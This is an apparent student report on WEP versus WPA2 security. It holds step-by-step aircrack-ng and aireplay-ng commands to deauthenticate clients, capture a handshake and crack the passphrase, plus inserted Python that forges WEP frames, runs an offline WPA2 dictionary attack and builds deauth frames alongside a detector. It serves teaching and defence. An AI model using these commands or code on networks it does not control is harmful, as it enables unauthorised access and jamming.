WEP vs WPA2 e - cysecure.orgcysecure.org/560/online/project/wpa2Encrypt_rajRamadhim_bashMoha… ·...
WEP VS WPA2
Encryptions
Mercy College
Alexander Martin, Basiru Mohammed, Rajkumar Ramadhin
IASP 560
December 13, 2019
Contents
1.0 Introduction
2.0 Problem Description
3.0 WEP Encryption
3.1 WEP Vulnerabilities
4.0 WPA2 Encryption
4.1 WPA2 Vulnerabilities
5.0 Our Approach
5.1 Cracking WPA/WPA2 Wi-Fi Router with Aircrack-ng
5.1.1 Setting up the field
5.1.2 Preparing the field
5.1.3 Finding the Target
5.1.4 Capture the 4-way Handshake
5.1.5 Cracking With Aircrack-ng
5.2 Password Cracking: WEP
5.3 Using Bash Script to perform a de-authentication attack
6.0 Conclusion
7.0 References
1.0 Introduction
As technology advances, so does security. Security algorithms to protect wireless
networks were created to protect people from malicious users. Unfortunately, this does not
always work: shortly after WEP was created, multiple security flaws were discovered. WEP was
followed by several patched variants and by the interim WPA before the industry moved to the
now-standard WPA2. While WPA2 is more secure, it still has vulnerabilities of its own. This
report aims to look at the weaknesses and exploit them in real-world scenarios. The significance
of this research becomes obvious as ordinary people fall victim to seemingly "safe" encryption
and leave themselves open to several attacks. This paper will enable an individual using a router
with either encryption to know how to protect his or her network. Also, in 2015 it was reported
that some AirBnB owners were found to have installed secret surveillance cameras in their rented
apartments/houses. As a result, a programmer created a bash script that performs a
de-authentication attack using minimal tools or programs. This will help the ordinary tourist
know how to kick any such devices offline (if any) and sleep soundly in his or her temporary
home knowing that nobody is spying on him or her.
2.0 Problem Description
There have been several encryption methods in succession: whenever one is developed and
becomes vulnerable due to advances in technology, another is developed to replace or
supplement it. It started with WEP, which was meant to give WLAN technology the privacy of a
wired network. Unfortunately, it failed for a number of reasons and was eventually superseded,
first by WPA and then by WPA2. This paper aims to compare the encryption methods and the
ease of realistically cracking their individual passwords. We also evaluated the difference WEP
would make on IoT devices compared to WPA2. Further recommendations will be made on
which to use and how best to protect a network using either.
3.0 WEP Encryption
Wired Equivalent Privacy (WEP) was introduced in 1997 as part of the original IEEE
802.11 standard. Its goal was to give a wireless LAN the same level of privacy as a traditional
wired network, and it was the industry standard by 1999. WEP encrypts with the stream cipher
Rivest Cipher 4 (RC4). The original "64-bit" WEP combined a 40-bit secret key with a 24-bit
initialization vector (IV) that is sent in the clear with every frame; the key length was limited
by the US Government's export restrictions on cryptography at the time. It was later extended
to "128-bit" WEP (a 104-bit key plus the same 24-bit IV), and some vendors offered a "256-bit"
variant (a 232-bit key). Even though the 256-bit variant exists, 128-bit WEP remained the
common configuration. Note that the advertised key size includes the IV: the secret part of a
128-bit WEP key is only 104 bits, and the IV space is only 2^24 values.
Shared Key authentication works by having the client send an authentication request to
the Access Point. The Access Point responds with a clear-text challenge. The client encrypts the
challenge with the configured WEP key and returns it in a second authentication frame. Finally,
the Access Point decrypts the response and, if it matches the challenge, sends back a success
response. This exchange is itself a weakness: an eavesdropper who captures the clear-text
challenge and the encrypted reply can XOR them to recover the RC4 keystream for that IV,
which is enough to pass the same challenge later without knowing the key. For this reason Open
System authentication was generally recommended over Shared Key even while WEP was in use.
3.1 WEP Vulnerabilities
WEP features a multitude of vulnerabilities. The first is that it does not prevent
forgery of packets: the integrity check value (ICV) is a CRC-32, which is linear, so an attacker
can flip bits in an encrypted frame and correct the ICV without knowing the key. It does not
protect against replay attacks, since frames carry no sequence number that the receiver checks.
Because the per-frame RC4 key is simply the 24-bit IV concatenated with the static key, IVs
repeat after a few thousand frames, and two frames encrypted under the same IV share a
keystream, so knowing one plaintext reveals the other; a captured keystream can also be reused
to inject traffic or to authenticate to the Access Point without the key. Finally, the way WEP
feeds the IV into RC4 exposes statistically weak keys: the FMS, KoreK and PTW attacks recover
the full secret key from captured traffic (on the order of tens of thousands of IVs for PTW),
which tools such as aircrack-ng complete in minutes. This is key recovery from ciphertext, not
a brute-force search of the key space.
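The structural weaknesses above can be shown end to end in a few dozen lines. The following Python is an added example written for this edit; it is not code from the paper or from any tool it names, and the key, IV and frame contents are constructed. It implements WEP's encryption (RC4 keyed with IV || key, CRC-32 ICV) and then mounts two of the attacks without knowing the key: forging a frame by flipping plaintext bits and correcting the ICV (possible because CRC-32 is linear over XOR), and decrypting a frame whose IV collided with one of known plaintext. It also computes the birthday bound that shows why a 24-bit IV is reused after only a few thousand frames.

```python
import struct
import zlib


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA then PRGA). WEP seeds it with IV || shared key."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def crc32(data: bytes) -> bytes:
    """WEP's ICV: CRC-32 of the plaintext, little-endian, appended before encryption."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV (3 bytes, in clear) || key-id byte || RC4(IV||key, plaintext || ICV)."""
    return iv + b"\x00" + rc4(iv + key, plaintext + crc32(plaintext))


def wep_decrypt(key: bytes, frame: bytes) -> tuple:
    """Returns (plaintext, icv_ok) exactly as a receiver would compute them."""
    iv, body = frame[:3], frame[4:]
    clear = rc4(iv + key, body)
    plaintext, icv = clear[:-4], clear[-4:]
    return plaintext, icv == crc32(plaintext)


def forge_bitflip(frame: bytes, delta: bytes) -> bytes:
    """Flip plaintext bits of a captured frame WITHOUT the key (delta is as long as the plaintext).
    CRC-32 is affine over XOR: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros of the same length),
    so the encrypted ICV can be patched to match the patched plaintext."""
    icv_delta = bytes(a ^ b for a, b in zip(crc32(delta), crc32(bytes(len(delta)))))
    patch = delta + icv_delta
    return frame[:4] + bytes(c ^ p for c, p in zip(frame[4:], patch))


def recover_plaintext_on_iv_reuse(known_frame: bytes, known_plaintext: bytes,
                                  target_frame: bytes) -> bytes:
    """Two frames under the same IV share a keystream, so c1 ^ c2 == p1 ^ p2."""
    assert known_frame[:3] == target_frame[:3], "attack needs an IV collision"
    keystream = bytes(c ^ p for c, p in zip(known_frame[4:], known_plaintext))
    return bytes(c ^ k for c, k in zip(target_frame[4:], keystream))


def iv_collision_probability(frames: int, iv_bits: int = 24) -> float:
    """Birthday bound: probability that at least two of `frames` random IVs coincide."""
    space = 1 << iv_bits
    p_distinct = 1.0
    for i in range(frames):
        p_distinct *= 1.0 - i / space
    return 1.0 - p_distinct


def demo() -> dict:
    key = bytes.fromhex("0102030405")   # constructed 40-bit ("64-bit WEP") key
    iv = b"\x11\x22\x33"                # constructed IV; real cards count or randomise it
    frame = wep_encrypt(key, iv, b"GET /index.html")

    # Attack 1: rewrite "index" as "admin" and fix the ICV, no key needed.
    delta = bytes(5) + bytes(a ^ b for a, b in zip(b"index", b"admin")) + bytes(5)
    forged_plain, forged_ok = wep_decrypt(key, forge_bitflip(frame, delta))

    # Attack 2: a second frame sent under the same IV leaks its plaintext.
    second = wep_encrypt(key, iv, b"POST /login.htm")
    leaked = recover_plaintext_on_iv_reuse(frame, b"GET /index.html", second)

    return {"forged_plaintext": forged_plain, "forged_icv_ok": forged_ok,
            "leaked_plaintext": leaked,
            "p_collision_4823": iv_collision_probability(4823)}


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

The forged frame decrypts to "GET /admin.html" with a valid ICV, and the collision probability for 4823 frames comes out at about 50 percent: on a busy network that is seconds of traffic, which is why IV reuse is not a corner case. The same keystream-reuse principle is what the KRACK attack in section 4.1 exploits against CCMP, where the nonce rather than the IV is forced to repeat.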
To solve these problems, WEP2 and WEP+ were introduced. WEP2 was a stopgap present in
early 802.11i drafts for hardware that could not run WPA or WPA2; it extended both the IV and
the key to 128 bits in an attempt to fix the IV reuse and weak-key problems. Once it became
clear that the whole WEP algorithm was deficient, not just the IV and key sizes, the WEP2 name
and design were dropped, and only the extended key lengths survived in what became WPA's
TKIP. TKIP also took over the idea of changing keys from "dynamic WEP", an 802.1X/EAP
based, vendor-specific scheme that rotated WEP keys per session but never appeared in standard
WEP. WEP+ (WEPplus) was a proprietary variant by Agere Systems that avoided the "weak"
IVs exploited by the FMS attack. Its improvement was only fully effective when both endpoints
used WEP+, and it did nothing against the forgery, replay and keystream-reuse attacks above.
4.0 WPA2 Encryption
In 2004, the Institute of Electrical and Electronics Engineers (IEEE) ratified 802.11i, an
amendment to the existing 802.11 wireless network standard, because of the well-known
weaknesses of WEP and of WPA's TKIP [1]. The Wi-Fi Alliance, the industry organization that
owns the Wi-Fi trademark, adopted 802.11i as the basis of its WPA2 certification; WPA had been
an interim certification based on a draft of 802.11i so that legacy hardware could be patched
rather than replaced [2].
The main improvement of WPA2 is that it makes AES-CCMP mandatory in place of TKIP.
This applies to both WPA2-Personal (pre-shared key) and WPA2-Enterprise (802.1X); the
Personal/Enterprise distinction concerns how the Pairwise Master Key is obtained, not which
cipher is used. The Temporal Key Integrity Protocol (TKIP) is not a new cipher: it wraps the
same RC4 stream cipher used by WEP, but mixes the temporal key, the transmitter address and a
48-bit per-packet sequence counter into a fresh 128-bit RC4 key for each packet, and uses that
sequence counter to reject replayed frames. This closed the IV reuse and replay problems that
made any WEP network vulnerable to cracking software. Where WEP relies on a Cyclic
Redundancy Check, TKIP adds a keyed Message Integrity Code called Michael, which is much
stronger than a CRC but, because it had to run on WEP-era hardware, is only a 64-bit MIC with
known weaknesses, backed by countermeasures that shut the link down after two MIC failures
within a minute.
However, the problems for TKIP started in 2008, when Martin Beck and Erik Tews showed
how to exploit 802.11e QoS channels, each of which has its own replay counter, to decrypt short
packets such as ARP frames in a TKIP protected network and to inject a handful of forged
frames, all without recovering the key.
AES is used in WPA2 through CCMP (Counter Mode with Cipher Block Chaining Message
Authentication Code Protocol), which provides confidentiality (AES in counter mode) and
integrity (a CBC-MAC) under one key, with a 48-bit packet number serving both as the nonce
and as the replay counter. AES-CCMP is not susceptible to the RC4 and Michael weaknesses
that brought TKIP to its knees in 2008 and 2009. However, even though WPA2 certification
requires AES-CCMP, it remains backward compatible with TKIP, so many networks still run in
a mixed WPA/WPA2 mode with TKIP enabled for older devices that cannot do CCMP. A
network in that mode is only as strong as TKIP, and its group (multicast) key is TKIP for every
client, including the ones capable of CCMP.
4.1 WPA2 Vulnerabilities
Just when AES-CCMP seemed to have solved wireless encryption, the KRACK (Key
Reinstallation Attack) by Mathy Vanhoef and Frank Piessens, published in October 2017, showed
that the 802.11i 4-way handshake itself could be abused. Because frames can be lost, the
standard lets the Access Point retransmit message 3 of the handshake, and a client that receives
it again reinstalls the same session key. Reinstalling the key resets the packet number (the
CCMP nonce) and the replay counter to their starting values. An attacker in a man-in-the-middle
position can therefore block message 3, collect the retransmissions and replay them to the client
later, forcing it to encrypt new frames under an already-used nonce. Since CCMP is counter
mode, a reused nonce means a reused keystream, which lets the attacker decrypt and replay
traffic, and with TKIP or GCMP also forge frames. The attack does not recover the Wi-Fi
password or the PMK, and it is a client-side flaw fixed by patching the supplicant; Android and
Linux devices running wpa_supplicant 2.4 and 2.5 were worst affected because they reinstalled
an all-zero key. Separately, when both WPA and WPA2 are enabled on a router (mixed mode),
some clients experience connection failures.
5.0 Our Approach
For the implementation side of our project, after extensive research on the design and
vulnerabilities of the individual encryption methods under consideration, we set up procedures to
test how difficult it is to crack each of them. A testing environment based on Kali Linux is used
to try to crack a simple WEP password and a simple WPA2 password on networks we control.
Later, as the project evolves, we may attempt to bring a Wi-Fi based surveillance camera offline.
5.1 Cracking WPA/WPA2 Wi-Fi Router with Aircrack-ng
When Wi-Fi networks are secured with weak passwords, the procedure below illustrates how
they are cracked. Only the final step is offline: capturing the handshake requires a client to
(re)connect, which the deauthentication step forces, so the attack is not passive and is visible to
anyone monitoring the channel.
5.1.1 Setting up the field
To begin this procedure, a fully operational Kali Linux system is required. Aircrack-ng is
installed with the Debian command sudo apt-get install aircrack-ng, and finally it must be
confirmed that the wireless card supports monitor mode (and, for the deauthentication step,
packet injection).
5.1.2 Preparing the field
• Before going into monitor mode, the commands airmon-ng check and airmon-ng check
kill are used to list and then terminate conflicting programs such as NetworkManager and
wpa_supplicant.
• Use the command airmon-ng to list wireless interfaces that support monitor mode, if any,
and note the wireless interface to be used, say wlan0.
• The command airmon-ng start wlan0 is used to place the wlan0 interface into monitor
mode. Current versions of Aircrack-ng create a new interface named wlan0mon; older
versions named it mon0.
• iwconfig is run to confirm that the selected interface is in monitor mode.
5.1.3 Finding the Target
• The command airodump-ng wlan0mon is used to listen to the 802.11 Beacon frames
broadcast by the wireless routers in range (the routers need no special support; only the
attacker's card has to be in monitor mode). Choose the network you want to crack, noting its
BSSID (MAC address) and the channel (CH) number displayed, to proceed with the next step.
5.1.4 Capture the 4-way Handshake
• WPA/WPA2 uses a 4-way handshake to authenticate devices to the network. This
handshake is captured by directing airodump-ng to monitor traffic on the target network
using the BSSID and channel values noted in the previous step.
• Begin capturing packets from the target router/network using airodump-ng -c
#channelnumber# -w capture --bssid #victimbssid# wlan0mon (the short form -d works in
place of --bssid). This locks the card to the one channel and writes every frame it sees for
that BSSID to capture-01.cap.
• Keep this running until the MAC address of a connected client (shown in the STATION
column) is obtained; it is needed for the next command.
• In a new terminal window use aireplay-ng --deauth 0 -a #victimbssid# -c #stationmac#
wlan0mon to send deauthentication frames to that client so that it reconnects and performs
the handshake again. A count of 0 sends frames indefinitely; a small count such as 5 is
usually enough and is less disruptive. Leave airodump-ng capturing meanwhile.
• While keeping an eye on the airodump-ng window, once a handshake is captured it will
display "WPA handshake: <BSSID>" at the top right, and the frames are already in the
.cap file.
• Use wireshark nameofcapturefile to view the captured handshake. In Wireshark, filter by
"eapol" and all four handshake messages will be seen; aircrack-ng needs at least two
consecutive messages (1 and 2, or 2 and 3), since the dictionary attack is checked against
the MIC in message 2 using the nonces from messages 1 and 2.
5.1.5 Cracking With Aircrack-ng
• To obtain a word list for the attack, the dictionary file "rockyou.txt" can be downloaded from
the URL https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt.
Kali already ships the same list compressed as /usr/share/wordlists/rockyou.txt.gz.
• In the terminal, change to the wordlist directory with cd /usr/share/wordlists/ and use ls to
list the files. If only the compressed file is present, decompress it with gzip -d rockyou.txt.gz.
• Cracking with the wordlist begins with the command aircrack-ng #nameofcapturedfile# -w
/usr/share/wordlists/rockyou.txt, and when the password is found it is printed next to
"KEY FOUND!". If the list is exhausted without a match, the passphrase is simply not in the
dictionary. This step is entirely offline, so the router sees nothing, and the only defence is a
passphrase that no wordlist contains.
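What aircrack-ng does in the last step of sections 5.1.4 and 5.1.5, and why a captured handshake is enough, is best seen by reimplementing it. The following Python is an added example written for this edit, not code from aircrack-ng or from the paper. It derives the PMK from the passphrase exactly as WPA/WPA2-Personal does (PBKDF2-HMAC-SHA1 over the SSID), expands the PTK with the 802.11 PRF, builds a handshake message 2 and signs it with the KCK on the "supplicant" side, then plays attacker: it takes only the values an eavesdropper has (SSID, both MACs, both nonces, the EAPOL frame with its MIC) and tries a wordlist until the recomputed MIC matches. The SSID, passphrase, MAC addresses, nonces and wordlist are constructed; the EAPOL frame layout follows the RSN key descriptor with the MIC field at byte offset 81.

```python
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL header (4) + RSN key descriptor fields before the Key MIC (77)


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11 PRF-512: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0..3, truncated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of MACs || min/max of nonces).
    Bytes 0..15 are the KCK, the key that signs the handshake messages."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC for descriptor version 2 (AES/CCMP networks): HMAC-SHA1 over the whole EAPOL
    frame with the MIC field zeroed, truncated to 16 bytes."""
    zeroed = eapol[:MIC_OFFSET] + bytes(16) + eapol[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed EAPOL-Key frame for handshake message 2, MIC field still all zero."""
    key_info = 0x010A  # descriptor version 2 (HMAC-SHA1-128), pairwise key, MIC present
    body = (bytes([2])                                  # descriptor type: RSN
            + struct.pack(">HH", key_info, 0)           # key information, key length
            + struct.pack(">Q", replay_counter)
            + snonce + bytes(16) + bytes(8) + bytes(8)  # nonce, key IV, RSC, reserved
            + bytes(16)                                 # Key MIC placeholder (offset 81)
            + struct.pack(">H", 0))                     # key data length
    return bytes([0x02, 0x03]) + struct.pack(">H", len(body)) + body  # EAPOL v2, type Key


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """Offline dictionary attack: recompute the MIC for each candidate passphrase."""
    captured_mic = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, ssid)
        kck = derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), captured_mic):
            return candidate
    return None


def demo():
    # Constructed handshake: everything a capture of messages 1 and 2 gives the attacker.
    ssid, passphrase = "TestLab", "password123"
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))

    # Supplicant side: derive the PTK and sign message 2 with the KCK.
    kck = derive_ptk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    msg2 = build_msg2(snonce)
    msg2 = msg2[:MIC_OFFSET] + eapol_mic(kck, msg2) + msg2[MIC_OFFSET + 16:]

    # Attacker side: SSID from the beacon, MACs and nonces from the air, MIC from message 2.
    wordlist = ["letmein", "qwerty", "summer2019", "password123", "hunter2"]
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, msg2, wordlist)


if __name__ == "__main__":
    print("KEY FOUND:", demo())
```

Nothing in the loop contacts the network, which is why the attack cannot be rate limited by the router and why the passphrase, not the cipher, is the weak point of WPA2-Personal. The 4096 PBKDF2 rounds cost a few milliseconds per candidate here; hashcat's WPA-PBKDF2 mode moves the same computation to a GPU at several hundred thousand candidates per second, so any passphrase in a public wordlist should be assumed broken. WPA3-Personal replaces this derivation with the SAE password-authenticated key exchange, in which a captured handshake does not allow offline guessing.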
5.2 Password Cracking: WEP
To crack WEP we plan to utilize a Kali Linux tool known as wifite. Wifite is an out-of-the-box
automated WEP, WPA and WPS cracking tool, and its automation is impressive. It is
customizable with only a few arguments (timeouts, packets/second). It scans and sorts the targets
by signal strength and attacks the access points with the strongest signal first. It automatically
sends deauthentication frames to reveal hidden SSIDs. It has an "anonymous" feature which
changes the MAC address before the attack and restores it when the attack is done. Captured
WPA handshakes are backed up to the current directory of wifite.py. Any attack in progress can
be stopped with Ctrl+C, with the options to continue, move to the next target, skip, or exit, and
all cracked passwords are saved to cracked.txt. Note that against a WEP target wifite does not
use a wordlist at all: it collects IVs (replaying captured ARP frames to generate traffic quickly)
and hands them to aircrack-ng's PTW attack, which recovers the key directly; the
handshake-and-wordlist flow in the steps below is what it does against WPA/WPA2 targets.
Wifite at play is demonstrated below:
• Use airmon-ng start wlan0 to put interface wlan0 in monitor mode, as above.
• iwconfig is used to confirm that the interface is in monitor mode.
• Use the command wifite to begin wifite. It starts scanning for all Wi-Fi networks in the
vicinity; press Ctrl+C when the network you want to attack appears.
• It then prompts you to select the network(s) you want to attack, since multiple networks can
be queued. In this case we select 3. This initiates a number of attacks on the selected
network but provides the option to move or skip to the next attack.
• It performs the deauthentication attack on the network, captures the handshake and saves it
as a .cap file.
• It then analyses the .cap file and cracks the password using the built-in wordlist or
dictionary.
5.3 Using Bash Script To Perform A De-Authentication Attack
In 2015 it was reported that some AirBnB owners were found to have installed secret
surveillance cameras in their rented apartments/houses. As a result, a programmer created a
bash script that performs a de-authentication attack using minimal tools or programs. The
script auto-detects two types of popular cameras and automatically disconnects them from their
respective networks, bringing them offline. We will test this script to see its viability.
The script used in this process is called dropkick.sh, created by Julian Oliver (GitHub user
JulianOliver) and available through GitHub. The script does everything the aireplay-ng
procedure above does, but in a single shell script, and repeats every 30 seconds. The benefit of
repeating every 30 seconds is that it continually kicks the devices off the network, preventing
Wi-Fi cameras from reconnecting and spying. The biggest issue with dropkick.sh is that it
identifies cameras by manufacturer (the OUI prefix of the MAC address), so it will also
disconnect baby monitors and any other devices from those manufacturers on the network. The
only necessary step before running the script is chmod +x dropkick.sh to make the file
executable (note the plus sign; chmod -x would remove execute permission). Two caveats
apply: deliberately knocking other people's devices off the air with deauthentication frames is
illegal in many jurisdictions (the US FCC has fined hotels for doing it to guests), and a camera
that supports 802.11w Protected Management Frames, which WPA3 makes mandatory, simply
ignores forged deauthentication frames, so the script offers no protection against newer devices.
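The frames that dropkick.sh and aireplay-ng --deauth transmit are unauthenticated 802.11 management frames, which is what makes the attack trivial and also what makes it easy to spot. The following Python is an added example written for this edit, not the script's code: it builds a deauthentication frame the way a transmitter would (in memory only, nothing is sent), parses it back, and runs a simple flood detector over a constructed capture that alerts when one source address sends ten or more deauth/disassoc frames inside five seconds. The MAC addresses, timestamps and thresholds are assumptions.

```python
import struct
from collections import defaultdict, deque

BROADCAST = bytes.fromhex("ffffffffffff")
DEAUTH, DISASSOC = 12, 10   # management frame subtypes (frame type 0)


def build_deauth(bssid: bytes, target: bytes, reason: int = 7, seq: int = 0,
                 disassoc: bool = False) -> bytes:
    """802.11 deauth/disassoc: FC | duration | addr1 (dst) | addr2 (src) | addr3 (BSSID) | seq | reason.
    The source is the AP's address, spoofed; reason 7 is what aireplay-ng uses."""
    subtype = DISASSOC if disassoc else DEAUTH
    frame_control = struct.pack("<H", (0 << 2) | (subtype << 4))   # version 0, type 0 (mgmt)
    return (frame_control + struct.pack("<H", 0x013A) + target + bssid + bssid
            + struct.pack("<H", seq << 4) + struct.pack("<H", reason))


def parse_mgmt(frame: bytes):
    """Return (subtype, addr1, addr2, addr3, reason) for a management frame, else None."""
    fc0 = frame[0]
    ftype, subtype = (fc0 >> 2) & 0x3, fc0 >> 4
    if ftype != 0 or len(frame) < 26:
        return None
    addr1, addr2, addr3 = frame[4:10], frame[10:16], frame[16:22]
    reason = struct.unpack("<H", frame[24:26])[0] if subtype in (DEAUTH, DISASSOC) else None
    return subtype, addr1, addr2, addr3, reason


def detect_deauth_flood(captures, threshold: int = 10, window: float = 5.0) -> list:
    """captures: iterable of (timestamp_seconds, raw_80211_frame). Flags a source address that
    sends `threshold` or more deauth/disassoc frames within any `window`-second span."""
    recent = defaultdict(deque)   # source MAC -> timestamps inside the sliding window
    alerts = []
    for ts, raw in captures:
        parsed = parse_mgmt(raw)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _, addr1, addr2, _, reason = parsed
        q = recent[addr2]
        q.append(ts)
        while q and ts - q[0] > window:
            q.popleft()
        if len(q) == threshold:   # fire once as the burst crosses the line
            alerts.append({"source": addr2.hex(":"), "victim": addr1.hex(":"),
                           "count": len(q), "reason": reason, "at": ts})
    return alerts


def demo() -> list:
    ap = bytes.fromhex("001122334455")        # constructed BSSID
    camera = bytes.fromhex("66778899aabb")    # constructed client (the "camera")
    # Constructed capture: one legitimate deauth at t=0 (reason 3, station leaving), a data
    # frame, then a dropkick-style burst alternating broadcast and targeted frames every 0.1 s.
    captures = [(0.0, build_deauth(ap, camera, reason=3))]
    captures.append((5.0, bytes([0x08, 0x00]) + bytes(22)))   # data frame (type 2), ignored
    captures += [(10.0 + i * 0.1, build_deauth(ap, BROADCAST if i % 2 == 0 else camera, seq=i))
                 for i in range(64)]
    return detect_deauth_flood(captures)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

A single deauth with reason 3 is normal roaming traffic and is not reported; the burst is reported once, naming the spoofed source and the last victim. In practice the frames come from a monitor-mode capture (airodump-ng or tcpdump, radiotap header stripped), and a wireless IDS adds checks this example omits, such as sequence numbers that jump relative to the real AP's beacons. Detection is still only a warning: the fix is 802.11w, which makes the client drop deauthentication frames that do not carry a valid MIC.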
6.0 Conclusion
Through this research we learned the differences between the encryption methods used in
wireless security and focused on what makes WPA2 more secure than WEP. We were able to
learn the flaws of WEP and the evolution of wireless security. A long, random Wi-Fi passphrase
is a basic part of cyber hygiene, since the WPA2 dictionary attack above only succeeds when the
passphrase is in the attacker's wordlist, as is being aware of the access points you connect to.
Finally, through our implementation and testing, we found that the vulnerabilities are not only
password related: management frames are unauthenticated, so a client can be removed from the
network by anyone in range. This is not the end of wireless evolution, as WPA3 brings new
changes to the space (a password-authenticated key exchange that defeats offline dictionary
attacks, and mandatory Protected Management Frames), possibly making the vulnerabilities
found here no longer viable.
7.0 References
Dorsey, B. (2019, January 11). Crack WPA/WPA2 Wi-Fi Routers with Aircrack-ng and Hashcat. Retrieved from hakin9.org: https://hakin9.org/crack-wpa-wpa2-wi-fi-routers-with-aircrack-ng-and-hashcat/
Kali Tools. (n.d.). Wifite Package Description. Retrieved from Kali Tools: https://tools.kali.org/wireless-attacks/wifite
Kody. (2018, April 16). Hunting Down & Cracking WEP Networks. Retrieved from Null Byte: https://null-byte.wonderhowto.com/how-to/hack-wi-fi-hunting-down-cracking-wep-networks-0183712/
lacaskauffman. (2013, August 28). WiFi security: history of insecurities in WEP, WPA and WPA2. Retrieved from Blog Overflow: https://security.blogoverflow.com/2013/08/wifi-security-history-of-insecurities-in-wep-wpa-and-wpa2/
Lashkari, A., Mansoori, M., & Danesh, A. (2009). Wired Equivalent Privacy (WEP) versus Wi-Fi Protected Access (WPA). International Conference on Signal Processing Systems (pp. 445-449).
Mitchell, B. (2019, July 09). An Overview of Wireless Protected Access 2 (WPA2). Retrieved from Lifewire: https://www.lifewire.com/what-is-wpa2-818352
Oliver, J. (2015, December 18). Detect and disconnect WiFi cameras in that AirBnB you're staying in. Retrieved from Julian Oliver: https://julianoliver.com/output/log_2015-12-18_14-39
Skerritt, B. (2019, October 14). Forcing a device to disconnect from WiFi using a deauthentication attack. Retrieved from Hackernoon: https://hackernoon.com/forcing-a-device-to-disconnect-from-wifi-using-a-deauthentication-attack-f664b9940142
Slater, J. (2019, October 3). A brief history of Wi-Fi security protocols from "oh my, that's bad" to WPA3. Retrieved from Ars Technica: https://arstechnica.com/gadgets/2019/03/802-eleventy-who-goes-there-wpa3-wi-fi-security-and-what-came-before-it/